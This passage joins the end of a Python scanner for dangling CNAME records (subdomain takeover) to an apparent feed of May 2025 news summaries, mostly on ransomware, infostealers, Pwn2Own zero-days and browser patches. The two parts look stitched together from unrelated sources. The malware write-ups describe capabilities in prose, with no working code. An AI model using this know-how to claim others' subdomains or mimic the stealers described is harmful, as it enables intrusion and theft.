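    for name, rtype, target in records:
        if rtype != "CNAME":
            continue
        provider, wildcard = classify_target(target)
        if provider is None:
            continue
        if wildcard:
            status = "verify_via_http"   # resolves regardless; look for NoSuchBucket / 404 at the provider
        elif resolve(target) is None:
            status = "dangling"          # the record points at a name nobody owns any more
        else:
            status = "resolves"
        findings.append({"name": name, "target": target, "provider": provider, "status": status})
    return findings


if __name__ == "__main__":
    for finding in find_dangling_cnames(RECORDS):
        print(finding)
```

Run it against a zone export with `resolve=resolve_live`; every "dangling" result is a subdomain an attacker can claim by creating the resource, and every "verify_via_http" result still needs the bucket or app name checked before it is ruled out.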


Mobile carrier Cellcom confirms cyberattack behind extended outages

ciber Telcos
2025-05-20 https://www.bleepingcomputer.com/news/security/mobile-carrier-cellcom-confirms-cyberattack-behind-extended-outages/
Wisconsin wireless provider Cellcom has confirmed that a cyberattack is responsible for the widespread service outage and disruptions that began on the evening of May 14, 2025. [...]

Autosummary: Cellcom initially claimed the disruption was caused by a technical issue, stating that data services, iMessage, RCS messaging, and 911 emergency services remained operational.


VanHelsing ransomware builder leaked on hacking forum

exploits ransomware
2025-05-20 https://www.bleepingcomputer.com/news/security/vanhelsing-ransomware-builder-leaked-on-hacking-forum/
The VanHelsing ransomware-as-a-service operation published the source code for its affiliate panel, data leak blog, and Windows encryptor builder after an old developer tried to sell it on the RAMP cybercrime forum. [...]

Autosummary: (Image: common.h header file used by the builder; source: BleepingComputer.) However, the leak also includes the source code for the affiliate panel, which hosts the api.php endpoint, so threat actors could modify the code or run their own version of this panel to get the builder to work.


Trojanized RVTools push Bumblebee malware in SEO poisoning campaign

exploits
2025-05-20 https://www.bleepingcomputer.com/news/security/trojanized-rvtools-push-bumblebee-malware-in-seo-poisoning-campaign/
The official website for the RVTools VMware management tool was taken offline in what appears to be a supply chain attack that distributed a trojanized installer to drop the Bumblebee malware loader on users' machines. [...]

Autosummary: RVTools, initially developed by Robware and now owned by Dell, is a Windows utility that provides comprehensive inventory and health reporting for VMware vSphere environments. (Image: notice on robware.net and rvtools.com; source: BleepingComputer.) “When it came back online, the download had changed: the file size was smaller, and the hash now matched the clean version listed on the site.” Bumblebee is a malware loader that is typically promoted via SEO poisoning, malvertising, and phishing attacks. While the Conti ransomware operation shut down in 2022, many of its members split off into other ransomware operations, including Black Basta, Royal, Silent Ransom, and others, who likely still have access to the tooling.


Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations

exploits
2025-05-20 https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141b

Summary

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors. According to FBI information and trusted third-party reporting, this activity has been observed as recently as May 2025. The IOCs included in this advisory were associated with LummaC2 malware infections from November 2023 through May 2025.

The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of LummaC2 malware.

For a downloadable copy of IOCs, see: AA25-141B STIX XML (XML, 146.54 KB)

Autosummary: Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection [TA0010, T1119]. Technical Details. Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17.


The inside story of a council held to ransom in cyber-attack

government
2025-05-19 https://www.bbc.com/news/articles/cpw72pxrgdzo
The BBC investigates one of the most damaging ransomware attacks on a UK local council.

Autosummary: In the days before Saturday 8 February 2020, an email with a seemingly innocuous attachment arrived in a council inbox. Mary Lanigan said the impact of the cyber-attack had been "devastating". The former head of the National Cyber Security Centre (NCSC), Ciaran Martin, said his "biggest cyber-security worry" was the threat of simultaneous attacks on public services, like councils and hospitals, which had the potential to "wreck lives". The exact figure has never been made public, but Mr Martin said that, based on similar attacks, it was likely to have been in the "low single figure millions of US dollars". A year later, in February 2023, a group of Russian hackers were sanctioned by the UK and US governments over a string of attacks on businesses, schools and councils, including Redcar and Cleveland.


AI hallucinations and their risk to cybersecurity operations

ciber
2025-05-19 https://www.helpnetsecurity.com/2025/05/19/ai-hallucinations-risk-cybersecurity-operations/

AI systems can sometimes produce outputs that are incorrect or misleading, a phenomenon known as hallucinations. These errors can range from minor inaccuracies to misrepresentations that can misguide decision-making processes. Real world implications “If a company’s AI agent leverages outdated or inaccurate data, AI hallucinations might fabricate non-existent vulnerabilities or misinterpret threat intelligence, leading to unnecessary alerts or overlooked risks. Such errors can divert resources from genuine threats, creating new vulnerabilities and wasting already-constrained SecOps … More

The post AI hallucinations and their risk to cybersecurity operations appeared first on Help Net Security.

"

Autosummary: As to senior developers, they will likely spot an error in a timely manner, however, the increasing number of them over-rely on GenAI, blindly trusting its output,” said Ilia Kolochenko, CEO of ImmuniWeb. By embedding trust, traceability, and control into AI deployment, CISOs can balance innovation with accountability, keeping hallucinations in check without slowing progress: 1. “All AI-generated responses must carry metadata including source context, model version, prompt structure, and timestamp,” Conikee notes. "


Pwn2Own Berlin 2025: total prize money reached $1,078,750

financial
2025-05-19 https://securityaffairs.com/178040/hacking/pwn2own-berlin-2025-total-prize-money-reached-1078750.html
Pwn2Own Berlin 2025 wrapped up with $383,750 awarded on the final day, pushing the total prize money to $1,078,750 over three days. On the final day of Pwn2Own Berlin 2025, participants earned $383,750 for demonstrating zero-days in VMware Workstation, ESXi, Windows, NVIDIA, and Firefox. During the competition, the participants earned a total of $1,078,750, demonstrating […] "

Autosummary: Pwn2Own Berlin 2025: total prize money reached $1,078,750 (Pierluigi Paganini, May 19, 2025). Pwn2Own Berlin 2025 wrapped up with $383,750 awarded on the final day, pushing the total prize money to $1,078,750 over three days. "


Watch: Cat caught smuggling drugs into Costa Rica prison

latam
2025-05-19 https://www.bbc.com/news/videos/c0j7zexwpl9o
The feline was found carrying 235.65g of marijuana and 67.76g of heroin, authorities say. "

Autosummary: "


Mozilla fixes Firefox zero-days exploited at hacking contest

exploits
2025-05-19 https://www.bleepingcomputer.com/news/security/mozilla-fixes-firefox-zero-days-exploited-at-hacking-contest/
Mozilla released emergency security updates to address two Firefox zero-day vulnerabilities demonstrated in the recent Pwn2Own Berlin 2025 hacking competition. [...] "

Autosummary: "


Hackers earn $1,078,750 for 28 zero-days at Pwn2Own Berlin

exploits
2025-05-19 https://www.bleepingcomputer.com/news/security/hackers-earn-1-078-750-for-28-zero-days-at-pwn2own-berlin/
The Pwn2Own Berlin 2025 hacking competition has concluded, with security researchers earning $1,078,750 after exploiting 29 zero-day vulnerabilities and encountering some bug collisions. [...] "

Autosummary: "


ThreatMark offers protection against social engineering attacks and scams

financial
2025-05-19 https://www.helpnetsecurity.com/2025/05/19/threatmark-scamflag-capabilities/

ThreatMark launched ScamFlag, a Generative AI-powered solution designed to protect digital banks and their customers from scams and social engineering attacks. Seamlessly integrating into existing digital banking applications, ScamFlag enables financial institutions to provide their customers with scam detection capabilities without requiring separate app downloads or complex setup. The announcement comes as global fraud losses reached a staggering $486 billion in 2023, with more than 70% attributed to scams that trick legitimate users into … More

The post ThreatMark offers protection against social engineering attacks and scams appeared first on Help Net Security.

"

Autosummary: "


CTM360 maps out real-time phishing infrastructure targeting corporate banking worldwide

financial
2025-05-19 https://www.helpnetsecurity.com/2025/05/19/ctm360-cyberheist-phish-report/

A phishing operation that targets corporate banking accounts across the globe has been analyzed in a new report by CTM360. The campaign uses fake Google ads and advanced filtering techniques to steal sensitive login credentials and bypass MFA. Researchers uncovered more than 12,000 malicious redirector URLs spread across 35 unique potential phishing redirector templates. The infrastructure supports two distinct phishing techniques, both of which are difficult to detect and designed to evade automated scanning tools. What … More

The post CTM360 maps out real-time phishing infrastructure targeting corporate banking worldwide appeared first on Help Net Security.

"

Autosummary: Commands like “OTP,” “QUESTION,” or “2ND_USER” prompt the user to hand over additional details, scan QR codes, or involve other employees, increasing the potential damage. A persistent threat This campaign reflects an evolution in phishing tactics, where attackers use automation, live control, and targeted filtering to improve their success rate and avoid detection. Researchers observed thousands of redirector domains, hundreds of unique phishing URLs, and targeting activity across North America, the Middle East, and Europe. "


Firefox Patches 2 Zero-Days Exploited at Pwn2Own Berlin with $100K in Rewards

exploits
2025-05-19 https://thehackernews.com/2025/05/firefox-patches-2-zero-days-exploited.html
Mozilla has released security updates to address two critical security flaws in its Firefox browser that could be potentially exploited to access sensitive data or achieve code execution. The vulnerabilities, both of which were exploited as a zero-day at Pwn2Own Berlin, are listed below - CVE-2025-4918 - An out-of-bounds access vulnerability when resolving Promise objects that could allow an "

Autosummary: "


⚡ Weekly Recap: Zero-Day Exploits, Insider Threats, APT Targeting, Botnets and More

exploits
2025-05-19 https://thehackernews.com/2025/05/weekly-recap-zero-day-exploits-insider.html
Cybersecurity leaders aren’t just dealing with attacks—they’re also protecting trust, keeping systems running, and maintaining their organization’s reputation. This week’s developments highlight a bigger issue: as we rely more on digital tools, hidden weaknesses can quietly grow.  Just fixing problems isn’t enough anymore—resilience needs to be built into everything from the ground up. "

Autosummary: This week's list includes — CVE-2025-30397, CVE-2025-30400, CVE-2025-32701, CVE-2025-32706, CVE-2025-32709 (Microsoft Windows), CVE-2025-42999 (SAP NetWeaver), CVE-2024-11182 (MDaemon), CVE-2025-4664 (Google Chrome), CVE-2025-4632 (Samsung MagicINFO 9 Server), CVE-2025-32756 (Fortinet FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera), CVE-2025-4427, CVE-2025-4428 (Ivanti Endpoint Manager Mobile), CVE-2025-3462, CVE-2025-3463 (ASUS DriverHub), CVE-2025-47729 (TeleMessage TM SGNL), CVE-2025-31644 (F5 BIG-IP), CVE-2025-22249 (VMware Aria Automation), CVE-2025-27696 (Apache Superset), CVE-2025-4317 (TheGem WordPress theme), CVE-2025-23166 (Node.js), CVE-2025-47884 (Jenkins OpenID Connect Provider Plugin), CVE-2025-47889 (Jenkins WSO2 Oauth Plugin), CVE-2025-4802 (Linux glibc), and CVE-2025-47539 (Eventin plugin). While the set of attacks was believed to be confined to drone manufacturers in Taiwan, a subsequent analysis has uncovered that the campaign is broader and more sustained in scope than previously thought, hitting the heavy industry, media, technology, software services, healthcare, satellite, and military-adjacent supply chains, and payment service providers in both South Korea and Taiwan. While no passwords, private keys, or funds were exposed, the attackers made away with some amount of personal information, including names, addresses, phone numbers, email addresses, government ID images, and account balances. "Following his arrest in September 2024 and continuing while in pretrial detention, Lam is alleged to have continued working with members of the enterprise to pass and receive directions, collect stolen cryptocurrency, and have enterprise members buy luxury Hermes Birkin bags and hand-deliver them to his girlfriend in Miami, Florida," the agency said. APT28 Behind Attacks Targeting Webmail Services — APT28, a hacking group linked to Russia's Main Intelligence Directorate (GRU), has been targeting webmail servers such as Roundcube, Horde, MDaemon, and Zimbra via cross-site scripting (XSS) vulnerabilities. The vulnerabilities include CVE-2025-30397, CVE-2025-30400, CVE-2025-32701, CVE-2025-32706, and CVE-2025-32709. "The various roles included database hackers, organizers, target identifiers, callers, money launderers, and residential burglars targeting hardware virtual currency wallets." Built entirely on AWS services like Lambda, S3, and DynamoDB, TrailAlerts lets you detect suspicious activity, correlate events, and send alerts through SNS or SES—without managing infrastructure or paying for unused capacity. The victims in 2024 alone included officials from regional national governments in Ukraine, Greece, Cameroon and Serbia, military officials in Ukraine and Ecuador, and employees of defense contracting firms in Ukraine, Romania and Bulgaria. The attacks, ongoing since at least 2023, targeted governmental entities and defense companies in Eastern Europe, although governments in Africa, Europe, and South America were also singled out. "


Mexico mourns Navy cadets killed in Brooklyn Bridge ship crash

latam
2025-05-19 https://www.bbc.com/news/articles/c7807vexn0go
América Sánchez, 20, and Adal Jair Maldonado Marcos, 23, died when the tall ship lost power and drifted into the bridge. "

Autosummary: The body of América Sánchez will be taken to her home town of Xalapa on Monday. "She was a warrior, a soldier who didn't give up, who always fought for her goals," she said, adding that her daughter only had one year left until her graduation. "


Arla Foods confirms cyberattack disrupts production, causes delays

ciber
2025-05-19 https://www.bleepingcomputer.com/news/security/arla-foods-confirms-cyberattack-disrupts-production-causes-delays/
Arla Foods has confirmed to BleepingComputer that it was targeted by a cyberattack that has disrupted its production operations. [...] "

Autosummary: The firm has an annual revenue of €13.8 billion ($15.5 billion), and its products, including the brands Arla, Lurpak, Puck, Castello, and Starbucks, are sold in 140 countries worldwide. "


Microsoft open-sources Windows Subsystem for Linux at Build 2025

Linux
2025-05-19 https://www.bleepingcomputer.com/news/microsoft/microsoft-open-sources-windows-subsystem-for-linux-at-build-2025/
Microsoft has open-sourced the Windows Subsystem for Linux (WSL), making its source code available on GitHub, except for a few components that are part of Windows. [...] "

Autosummary: "


UK Legal Aid Agency confirms applicant data stolen in data breach

financial
2025-05-19 https://www.bleepingcomputer.com/news/security/uk-legal-aid-agency-confirms-applicant-data-stolen-in-data-breach/
The United Kingdom's Legal Aid Agency (LAA) has confirmed that a recent cyberattack is more serious than first believed, with hackers stealing a large trove of sensitive applicant data in a data breach. [...] "

Autosummary: "


Update your Chrome to fix serious actively exploited vulnerability

exploits
2025-05-19 https://www.malwarebytes.com/blog/news/2025/05/update-your-chrome-to-fix-serious-actively-exploited-vulnerability
Make sure your Chrome is on the latest version, to patch against an actively exploited vulnerability that can be used to steal sensitive information from websites. "

Autosummary: When you visit a website, your browser often needs to load additional pieces of that site, such as images, scripts, or stylesheets, which may come from various sources. "


RVTools Official Site Hacked to Deliver Bumblebee Malware via Trojanized Installer

exploits
2025-05-19 https://thehackernews.com/2025/05/rvtools-official-site-hacked-to-deliver.html
The official site for RVTools has been hacked to serve a compromised installer for the popular VMware environment reporting utility. "Robware.net and RVTools.com are currently offline. We are working expeditiously to restore service and appreciate your patience," the company said in a statement posted on its website. "Robware.net and RVTools.com are the only authorized and supported websites for "

Autosummary: XRed, believed to be active since at least 2019, comes with features to collect system information, log keystrokes, propagate via connected USB drives, and execute commands sent from an attacker-controlled server to capture screenshots, enumerate file systems and directories, download files, and delete files from the system. "


Ransomware Gangs Use Skitnet Malware for Stealthy Data Theft and Remote Access

exploits
2025-05-19 https://thehackernews.com/2025/05/ransomware-gangs-use-skitnet-malware.html
Several ransomware actors are using a malware called Skitnet as part of their post-exploitation efforts to steal sensitive data and establish remote control over compromised hosts. "Skitnet has been sold on underground forums like RAMP since April 2024," Swiss cybersecurity company PRODAFT told The Hacker News. "However, since early 2025, we have observed multiple ransomware operators using it "

Autosummary: Some of the supported PowerShell commands are listed below: Startup, which ensures persistence by creating shortcuts in the Startup directory of the victim's device; Screen, which captures a screenshot of the victim's desktop; Anydesk/Rutserv, which deploys a legitimate remote desktop software like AnyDesk or Remote Utilities ("rutserv.exe"); Shell, to run PowerShell scripts hosted on a remote server and send the results back to the C2 server; AV, which gathers a list of installed security products. "Skitnet is a multi-stage malware that leverages multiple programming languages, and encryption techniques," PRODAFT said. "


Fake KeePass password manager leads to ESXi ransomware attack

exploits ransomware
2025-05-19 https://www.bleepingcomputer.com/news/security/fake-keepass-password-manager-leads-to-esxi-ransomware-attack/
Threat actors have been distributing trojanized versions of the KeePass password manager for at least eight months to install Cobalt Strike beacons, steal credentials, and ultimately, deploy ransomware on the breached network. [...] "

Autosummary: The aenys[.]com domain was used to host additional subdomains that impersonated well-known companies and services, such as WinSCP, PumpFun, Phantom Wallet, Sallie Mae, Woodforest Bank, and DEX Screener. "


O2 UK patches bug leaking mobile user location from call metadata

exploits
2025-05-19 https://www.bleepingcomputer.com/news/security/o2-uk-patches-bug-leaking-mobile-user-location-from-call-metadata/
A flaw in O2 UK's implementation of VoLTE and WiFi Calling technologies could allow anyone to expose the general location of a person and other identifiers by calling the target. [...] "

Autosummary: However, as Williams discovered while analyzing the traffic during such a call, the signalling messages (SIP Headers) exchanged between the communicating parties are far too verbose and revealing, including IMSI, IMEI, and cell location data. "


Mozilla fixed zero-days recently demonstrated at Pwn2Own Berlin 2025

exploits
2025-05-19 https://securityaffairs.com/178064/security/mozilla-fixed-zero-days-demonstrated-at-pwn2own-berlin-2025.html
Mozilla addressed two critical Firefox vulnerabilities that could be potentially exploited to access sensitive data or achieve code execution. Mozilla released security updates to fix two critical vulnerabilities in the Firefox browser that could be potentially exploited to access sensitive data or achieve code execution. “This week at the security hacking competition pwn2own, security researchers […] "

Autosummary: Mozilla fixed zero-days recently demonstrated at Pwn2Own Berlin 2025 (Pierluigi Paganini, May 19, 2025). Mozilla addressed two critical Firefox vulnerabilities that could be potentially exploited to access sensitive data or achieve code execution. "


Elton brands government "losers" over AI copyright plans

government
2025-05-18 https://www.bbc.com/news/articles/c8jg0348yvxo
The musician accuses the government of robbing young artists over its copyright law plans. "

Autosummary: He added that the prime minister "must not sell" the next generation of singers, songwriters, musicians, and music creators "down the river and allow all that talent to be crushed by letting soulless AI bots plunder their work". "


Week in review: Microsoft patches 5 actively exploited 0-days, recently fixed Chrome vulnerability exploited

exploits
2025-05-18 https://www.helpnetsecurity.com/2025/05/18/week-in-review-microsoft-patches-5-actively-exploited-0-days-recently-fixed-chrome-vulnerability-exploited/

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Patch Tuesday: Microsoft fixes 5 actively exploited zero-days On May 2025 Patch Tuesday, Microsoft has released security fixes for 70+ vulnerabilities, among them five actively exploited zero-days and two publicly disclosed (but not exploited) vulnerabilities. How to give better cybersecurity presentations (without sounding like a robot) Most people think great presenters are born with natural talent. Luka Krejci, a presentation … More

The post Week in review: Microsoft patches 5 actively exploited 0-days, recently fixed Chrome vulnerability exploited appeared first on Help Net Security.

"

Autosummary: How Kim Crawley challenges big tech in “Digital Safety in a Dangerous World” In this Help Net Security interview, Kim Crawley, cybersecurity expert and Professor at the Open Institute of Technology, discusses her upcoming book Digital Safety in a Dangerous World, which will feature her expert advice, as well as insights from other cybersecurity experts, lawyers, and activists, on how to lawfully protect your safety and privacy in challenging times. Building cybersecurity culture in science-driven organizations In this Help Net Security interview, Anne Sofie Roed Rasmussen, CISO at Novonesis, discusses how a science-driven organization approaches cybersecurity, aligning innovation with protection, measuring cultural progress, managing shadow IT, and earning trust from scientific leaders. New infosec products of the week: May 16, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Hunted Labs, McAfee, Obsidian Security, PentestPad, Resecurity, and SecuX. "


SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 45

exploits
2025-05-18 https://securityaffairs.com/178024/malware/security-affairs-malware-newsletter-round-45-2.html
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: PupkinStealer: A .NET-Based Info-Stealer; Interlock ransomware evolving under the radar; Technical Analysis of TransferLoader; Sophisticated NPM Attack Leveraging Unicode Steganography and Google Calendar C2; Horabot Unleashed: A Stealthy Phishing Threat; High Risk Warning for Windows […] "

Autosummary: "


The world's most dangerous country for trade unionists

government
2025-05-18 https://www.bbc.com/news/articles/c0j715l2d6no
More trade union members are murdered in the South American nation than anywhere else. "

Autosummary: "For many years now already, unfortunately, Colombia is the deadliest country in the world for trade unionists and for trade union work," says Luc Triangle, general secretary of the International Trade Union Confederation (ITUC), a global umbrella organization based in Brussels. "If you look at where these attacks are happening, it's in the departments of Cauca, Nariño, Putumayo, Arauca, Norte de Santander and Caquetá, because that's where the biggest coca plantations are, and where the illegal mining is." Fabio Arias, the head of Colombia's largest trade union federation, the CUT, says it is all part of Colombia's long and complex civil conflict, which pitted left-wing rebel groups against right-wing paramilitaries, drug traffickers and the Colombian state, and which still rumbles on in some parts of the country. "


The secretive US factory that lays bare the contradiction in Trump's America First plan

industry
2025-05-18 https://www.bbc.com/news/articles/cwywj0zgzwxo
An exclusive look inside the closely guarded factory the president wants to become a foundation stone for a US golden age. "

Autosummary: The supply chain for semiconductors is global as no single country can do everything at the moment, says Rose Castanares, President of TSMC Arizona. On the walkway into the building are photographs showing Biden's visit in 2022, with the building site draped in the Stars and Stripes and a banner saying "a future Made in America". It is, in my view, the most important factory in the world, and it's being built by a company you may not have heard of: TSMC, Taiwan Semiconductor Manufacturing Company. So for now, it's a battle for global tech and economic supremacy, in which Taiwan's factory technology, some of which is now being moved to the Arizona desert, is the critical asset. The secretive US factory that lays bare the contradiction in Trump's America First plan, by Faisal Islam (@faisalislam), Economics editor, reporting from Arizona. Among the cactuses in the desert of Arizona, just outside Phoenix, an extraordinary collection of buildings is emerging that will shape the future of the global economy and the world. The expansion of the Arizona facility, which was announced in March, is, he believes, the poster child for his economic policies - in particular the encouragement of foreign companies to relocate factories to the US to avoid hefty tariffs. "


Apple boosts India's factory hopes - but a US-China deal could derail plans

industry
2025-05-18 https://www.bbc.com/news/articles/cly34p1jwvgo
The US-China trade "reset" could stall the manufacturing investment coming into India, say experts. "

Autosummary: Nomura, a Japanese broking house, also pointed to growing "anecdotal evidence" of India emerging as a winner from "trade diversion and supply-chain shift in low and mid-tech manufacturing" particularly in sectors like electronics, textiles and toys. "


U.S. CISA adds Google Chromium, DrayTek routers, and SAP NetWeaver flaws to its Known Exploited Vulnerabilities catalog

exploits
2025-05-17 https://securityaffairs.com/177962/hacking/u-s-cisa-adds-google-chromium-draytek-routers-and-sap-netweaver-flaws-to-its-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Google Chromium, DrayTek routers, and SAP NetWeaver flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Google Chromium, DrayTek routers, and SAP NetWeaver flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these flaws: According to Binding Operational […] "

Autosummary: "


US Government officials targeted with texts and AI-generated deepfake voice messages impersonating senior U.S. officials

government
2025-05-17 https://securityaffairs.com/177987/cyber-crime/us-government-officials-targeted-texts-and-ai-generated-deepfake.html
FBI warns ex-officials are targeted with deepfake texts and AI voice messages impersonating senior U.S. officials. The FBI warns that ex-government officials are being targeted with texts and AI-generated deepfake voice messages impersonating senior U.S. officials. The FBI warns of a campaign using smishing and vishing with deepfake texts and AI voice messages impersonating senior […] "

Autosummary: The FBI warns of a campaign using smishing and vishing with deepfake texts and AI voice messages impersonating senior U.S. officials to current or former senior US federal or state government officials and their contacts Since April 2025, threat actors have been using texts and AI voice messages impersonating senior U.S. officials to build trust and access personal accounts. "


Deepfake attacks could cost you more than money

financial
2025-05-16 https://www.helpnetsecurity.com/2025/05/16/camellia-chan-x-phy-defending-against-deepfakes/

In this Help Net Security interview, Camellia Chan, CEO at X-PHY, discusses the dangers of deepfakes in real-world incidents, including their use in financial fraud and political disinformation. She explains AI-driven defense strategies and recommends updating incident response plans and internal policies, integrating detection tools, and ensuring compliance with regulations like the EU’s DORA to mitigate liability. How have attackers used deepfakes in real-world incidents, even if hypothetically, and how plausible are those tactics becoming? … More

The post Deepfake attacks could cost you more than money appeared first on Help Net Security.

"

Autosummary: In this Help Net Security interview, Camellia Chan, CEO at X-PHY, discusses the dangers of deepfakes in real-world incidents, including their use in financial fraud and political disinformation.Advanced machine learning models, especially multi-modal AI, are becoming increasingly effective at spotting subtle, sophisticated signs of manipulation – from unnatural blinking and facial inconsistencies to mismatched audio-visual cues. This is just one example, but recently I’ve seen an increasing number of reports where companies were tricked into transferring large sums of money based on deepfaked video calls – some of our partners, customers, and even my internal staff have highlighted this as a concern. "


Polymorphic phishing attacks flood inboxes

financial
2025-05-16 https://www.helpnetsecurity.com/2025/05/16/polymorphic-phishing-attacks-cofense/

AI is transforming the phishing threat landscape at a pace many security teams are struggling to match, according to Cofense. In 2024, researchers tracked one malicious email every 42 seconds. Many of the 42-second attacks were part of polymorphic phishing attacks. Unlike traditional phishing methods, polymorphic phishing attacks rely on dynamic changes to the appearance and structure of malicious emails or links. Attackers use sophisticated algorithms to alter subject lines, sender addresses, and email content … More

The post Polymorphic phishing attacks flood inboxes appeared first on Help Net Security.

"

Autosummary: Industries with the largest increase in reported malicious emails: Education: 341%; Construction: 1,282%; Tax-related campaigns: 340%; Campaigns utilizing legitimate files: 575%. Microsoft has been identified as the most frequently spoofed brand in 2024. "


Cybersecurity Skills Framework connects the dots between IT job roles and the practical skills needed

ciber
2025-05-16 https://www.helpnetsecurity.com/2025/05/16/cybersecurity-skills-framework-linux-foundation/

The Linux Foundation, in collaboration with OpenSSF and Linux Foundation Education, has released the Cybersecurity Skills Framework, a global reference guide that helps organizations identify and address critical cybersecurity competencies across a broad range of IT job families. “Cybersecurity is now a leadership issue, not just a technical one,” said Steve Fernandez, General Manager at OpenSSF. “Our framework gives organizations a straightforward way to identify gaps and prioritize the security skills that matter most, based … More

The post Cybersecurity Skills Framework connects the dots between IT job roles and the practical skills needed appeared first on Help Net Security.

"

Autosummary: "


How working in a stressful environment affects cybersecurity

ciber
2025-05-16 https://www.helpnetsecurity.com/2025/05/16/stressful-environment-cybersecurity/

Stressful work environments don’t just erode morale, they can quietly undermine cybersecurity. When employees feel overworked, unsupported, or mistreated, their judgment and decision-making suffer. “From an organizational perspective, a toxic culture often leads to increased errors, missed threats, decreased productivity, and higher turnover rates,” said Rob Lee, Chief of Research and Head of Faculty at SANS Institute. According to CyberArk, 65% of office workers admit they’ve bypassed cybersecurity policies to stay productive. Frustration and anger … More

The post How working in a stressful environment affects cybersecurity appeared first on Help Net Security.

"

Autosummary: “From an organizational perspective, a toxic culture often leads to increased errors, missed threats, decreased productivity, and higher turnover rates,” said Rob Lee, Chief of Research and Head of Faculty at SANS Institute. "


Colombian police arrest alleged suspect in Peru mine workers" killings

latam
2025-05-16 https://www.bbc.com/news/articles/cvg7ekyvelpo
Thirteen men were kidnapped and killed at a gold mine in Pataz district earlier in May. "

Autosummary: "


CISA tags recently patched Chrome bug as actively exploited

exploits
2025-05-16 https://www.bleepingcomputer.com/news/security/cisa-tags-recently-patched-chrome-bug-as-actively-exploited-zero-day/
On Thursday, CISA warned U.S. federal agencies to secure their systems against ongoing attacks exploiting a high-severity vulnerability in the Chrome web browser. [...] "

Autosummary: This is the second actively exploited Chrome zero-day patched by Google this year, after another high-severity Chrome zero-day bug (CVE-2025-2783), which was abused to target Russian government organizations, media outlets, and educational institutions in cyber-espionage attacks. "


Google fixed a Chrome vulnerability that could lead to full account takeover

exploits
2025-05-16 https://securityaffairs.com/177899/security/google-fixed-a-chrome-vulnerability-that-could-lead-to-full-account-takeover.html
Google released emergency security updates to fix a Chrome vulnerability that could lead to full account takeover. Google released emergency security updates to address a Chrome browser vulnerability, tracked as CVE-2025-4664, that could lead to full account takeover. The security researcher Vsevolod Kokorin (@slonser_) discovered the vulnerability, which stems from an insufficient policy enforcement in […] "

Autosummary: In March 2025, Google released out-of-band fixes to address another high-severity security vulnerability, tracked as CVE-2025-2783, in Chrome browser for Windows. "


CISA: Recently fixed Chrome vulnerability exploited in the wild (CVE-2025-4664)

exploits
2025-05-16 https://www.helpnetsecurity.com/2025/05/16/cisa-recently-fixed-chrome-vulnerability-exploited-in-the-wild-cve-2025-4664/

A high-severity Chrome vulnerability (CVE-2025-4664) that Google has fixed on Wednesday is being leveraged by attackers, CISA has confirmed by adding the flaw to its Known Exploited Vulnerabilities catalog. About CVE-2025-4664 CVE-2025-4664 stems from insufficient policy enforcement in Google Chrome’s Loader, which attackers can use to make the browser leak cross-origin data that can be used to take over accounts. The vulnerability can be triggered with a maliciously crafted HTML page, on Chrome versions prior … More

The post CISA: Recently fixed Chrome vulnerability exploited in the wild (CVE-2025-4664) appeared first on Help Net Security.

"

Autosummary: “Google is aware that knowledge of CVE-2025-4664 exists in the wild,” the company said when it pushed out the update, and referred to an X (formerly Twitter) post by security researcher Vsevolod Kokorin, aka “slonser_”, as the source. "


Hackers exploit VMware ESXi, Microsoft SharePoint zero-days at Pwn2Own

exploits
2025-05-16 https://www.bleepingcomputer.com/news/security/hackers-exploit-vmware-esxi-microsoft-sharepoint-zero-days-at-pwn2own/
During the second day of Pwn2Own Berlin 2025, competitors earned $435,000 after exploiting zero-day bugs in multiple products, including Microsoft SharePoint, VMware ESXi, Oracle VirtualBox, Red Hat Enterprise Linux, and Mozilla Firefox. [...] "

Autosummary: "


Printer maker Procolored offered malware-laced drivers for months

exploits
2025-05-16 https://www.bleepingcomputer.com/news/security/printer-maker-procolored-offered-malware-laced-drivers-for-months/
For at least half a year, the official software supplied with Procolored printers included malware in the form of a remote access trojan and a cryptocurrency stealer. [...] "

Autosummary: G Data researcher Karsten Hahn offered to investigate, finding that at least six printer models (F8, F13, F13 Pro, V6, V11 Pro, and VF13 Pro) came with accompanying software hosted on the Mega file sharing platform that contained malware. Discovering RATs and coin stealers: After getting the threat alerts on his machine, Coward contacted Procolored, who denied shipping malware in their software, pointing to the security solution generating false positives. "


Ransomware gangs increasingly use Skitnet post-exploitation malware

exploits
2025-05-16 https://www.bleepingcomputer.com/news/security/ransomware-gangs-increasingly-use-skitnet-post-exploitation-malware/
Ransomware gang members increasingly use a new malware called Skitnet ("Bossnet") to perform stealthy post-exploitation activities on breached networks. [...] "

Autosummary: [Image: Skitnet's admin panel. Source: Prodaft] The supported commands are: startup - Establishes persistence by downloading three files (including a malicious DLL) and creating a shortcut to a legitimate Asus executable (ISP.exe) in the Startup folder. [Image: Skitnet's .NET loader. Source: Prodaft] Though ransomware groups often use custom tools tailored to specific operations and have low AV detection, these are costly to develop and require skilled developers who aren't always available, especially in lower-tier groups. "


Mexico accuses MrBeast of exploiting Mayan pyramids

exploits latam
2025-05-16 https://www.bbc.com/news/articles/crr70vykk0wo
Authorities say they never allowed Jimmy Donaldson to film at pyramid heritage sites for profit. "

